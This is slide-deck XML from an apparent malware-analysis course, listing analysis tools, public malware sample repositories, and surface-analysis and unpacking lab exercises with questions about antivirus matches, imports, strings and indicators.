              <a:t>CheatEngine: process memory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1"/>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Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p41"/>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285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>.Net Reflector: reverse .Net code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>On-line</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>VirusTotal.com: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cuckoo Sandbox: automated malware analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sysinternals Suite, Process Explorer (procexp.exe), Process Monitor (procmon.exe), Strings, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="300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2"/>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Malware Repositories</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Google Shape;438;p42"/>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Open Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://oc.gtisc.gatech.edu/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Virushare</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://virusshare.com/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Virusign</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.virusign.com/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Malware DB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://thezoo.morirt.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>……..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>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3"/>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Surface Analysis	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Google Shape;444;p43"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>www.virustotal.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Packed or Obfuscated</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>String contained</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hashing check</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>md5deep </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PE header analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>PEView</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Tek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4"/>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Practice 1 [Surface Analysis]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="8784976" cy="5472608"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>File: Lab01-01.exe, Lab01-01.dll; Lab01-04.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PEview</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PeiD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>String</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>HashCal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Check it on Virustotal: match any existing antivirus signatures?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When was it compiled? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Packed or obfuscated?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Imports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Strings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Host-based indicators &amp; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Network-based indicators</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80975" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976491" y="4293096"/>
            <a:ext cx="1080120" cy="1944216"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:no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52" name="Google Shape;452;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7053239" y="4942038"/>
            <a:ext cx="199285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Guess the purpose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of the PE file</a:t>
            </a:r>
            <a:endParaRPr sz="18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5"/>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Practice 2 [Pack &amp; Unpack]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p45"/>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457200" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>PE File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Lab01-02.exe; Lab01-03.exe</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-190500" lvl="2" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Check it on VirusTotal.com: match or not?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Compare the Strings differences before/after unpacking?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Check Imports?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Host-based indicators?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="742950" rtl="0" algn="l">
              <a:spcBef>
